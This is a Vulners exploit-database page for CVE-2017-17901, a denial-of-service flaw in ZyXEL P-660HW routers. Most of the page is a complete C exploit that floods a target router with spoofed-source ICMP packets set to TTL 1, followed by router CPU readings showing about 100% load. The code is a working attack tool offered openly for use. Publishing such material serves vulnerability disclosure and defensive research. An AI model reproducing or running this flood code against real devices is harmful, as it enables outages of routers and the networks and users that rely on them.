Vulners
Lucene search
ZyXEL P-660HW TTL Expiry Denial Of Service
| Reporter | Title | Published | Views | Family All 6 |
|---|---|---|---|---|
 | ZyXEL P-660HW Denial of Service Vulnerability | 2 Jan 201800:00 | – | cnvd |
 | CVE-2017-17901 | 29 Dec 201722:00 | – | cve |
 | CVE-2017-17901 | 29 Dec 201722:00 | – | cvelist |
 | EUVD-2017-9044 | 7 Oct 202500:30 | – | euvd |
 | CVE-2017-17901 | 29 Dec 201722:29 | – | nvd |
 | Code injection | 29 Dec 201722:29 | – | prion |
`################
#Exploit Title: ZyXEL TTL Expiry Denial of Service
CVE: CVE-2017-17901
#CWE: CWE-400
#Exploit Author: Hosein Askari
#Vendor HomePage: https://www.zyxel.com/
#Version : v3
#Tested on: ZyXEL P-660HW
#Category: Network Appliance
#Author Mail : [email protected]
#description: According to RFC 791, the router should destroy any datagram with value of less than or equal to one. ZyXEL P-660HW v3 devices allow remote attackers to cause a denial of service (CPU consumption) via
a flood of IP packets with a TTL of 1.
#####################
#include <sys/socket.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/time.h>
#include <pwd.h>
#include <time.h>
#include <sys/utsname.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/igmp.h>
void banner(void) {
printf("TTL Expiry ZyXEL\n");
printf("Author: Hosein Askari");
}
void usage(const char *progname) {
printf("use : ./ZeXEL RouterIP count\n");
}
int attack( const char *name, unsigned int port, struct sockaddr_in *addr ) {
struct hostent *host;
memset(addr,0,sizeof(struct sockaddr_in));
addr->sin_family = AF_INET;
addr->sin_addr.s_addr = inet_addr(name);
if (addr->sin_addr.s_addr == -1) {
if (( host = gethostbyname(name) ) == NULL ) {
fprintf(stderr,"unknown host\n",name);
return(-1);
}
addr->sin_family = host->h_addrtype;
memcpy((caddr_t)&addr->sin_addr,host->h_addr,host->h_length);
}
addr->sin_port = htons(port);
return(0);
}
unsigned short in_cksum(addr, len)
u_short *addr;
int len;
{
register int nleft = len;
register u_short *j = addr;
register int sum = 0;
u_short answer = 0;
while (nleft > 1) {
sum += *j++;
nleft -= 2;
}
if (nleft == 1) {
*(u_char *)(&answer) = *(u_char *)j ;
sum += answer;
}
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}
int func(int socket, unsigned long spoof_addr, struct sockaddr_in *dest_addr) {
unsigned char *packet;
struct iphdr *ip;
struct icmphdr *icmp;
int rc;
packet = (unsigned char *)malloc(sizeof(struct iphdr) + sizeof(struct icmphdr) + 8);
ip = (struct iphdr *)packet;
icmp = (struct icmphdr *)(packet + sizeof(struct iphdr));
memset(ip,0,sizeof(struct iphdr) + sizeof(struct icmphdr) + 8);
ip->ihl = 5;
ip->version = 4;
ip->tos = 4;
ip->id = htons(1234);
ip->frag_off = htons(0x2000);
ip->tot_len = 0;
ip->ttl = 1;
ip->protocol = IPPROTO_ICMP;
ip->saddr = rand() % 446674540;
ip->daddr = dest_addr->sin_addr.s_addr;
ip->check = in_cksum(ip, sizeof(struct iphdr));
icmp->type = rand() % 18;
icmp->code = rand() % 15;
icmp->checksum = in_cksum(icmp,sizeof(struct icmphdr) + 1);
if (sendto(socket, packet, sizeof(struct iphdr) + sizeof(struct icmphdr) + 1,0, (struct sockaddr *)dest_addr, sizeof(struct sockaddr)) == -1) { return(-1); }
free(packet);
return(0);
}
int main(int argc, char **argv) {
struct sockaddr_in dest_addr;
unsigned int i,sock;
unsigned long src_addr;
banner();
if ((argc != 3)) {
usage(argv[0]);
return(-1);
}
if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
fprintf(stderr,"run with root privilege\n");
return(-1);
}
src_addr = dest_addr.sin_addr.s_addr;
if (attack(argv[1],0,&dest_addr) == -1) { return(-1); }
for (i = 0;i < atoi(argv[2]);i++) {
if (func(sock,rand() % 4000000,&dest_addr) == -1) {
fprintf(stderr,"Error\n");
return(-1);
}
}
}
####################
ras> sys cpu display
CPU usage status:
baseline 2106307 ticks
sec ticks util sec ticks util sec ticks util sec ticks util
0 1712258 18.70 1 1730816 17.82 2 1738596 17.45 3 1715513 18.55
4 1529073 27.40 5 0 100.00 6 0 100.00 7 0 100.00
8 0 100.00 9 0 100.00 10 177665 91.56 11 1418797 32.64
12 0 100.00 13 0 100.00 14 0 100.00 15 0 100.00
16 0 100.00 17 0 100.00 18 0 100.00 19 0 100.00
20 0 100.00 21 0 100.00 22 0 100.00 23 0 100.00
24 0 100.00 25 0 100.00 26 0 100.00 27 0 100.00
28 0 100.00 29 0 100.00 30 0 100.00 31 0 100.00
32 0 100.00 33 0 100.00 34 0 100.00 35 0 100.00
36 0 100.00 37 0 100.00 38 0 100.00 39 0 100.00
40 0 100.00 41 0 100.00 42 0 100.00 43 0 100.00
44 0 100.00 45 0 100.00 46 0 100.00 47 0 100.00
48 0 100.00 49 0 100.00 50 0 100.00 51 0 100.00
52 0 100.00 53 0 100.00 54 0 100.00 55 0 100.00
56 0 100.00 57 0 100.00 58 0 100.00 59 0 100.00
60 758577 63.98 61 700450 66.74 62 0 100.00
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Dec 2017 00:00Current
7.7High risk
Vulners AI Score7.7
EPSS0.00499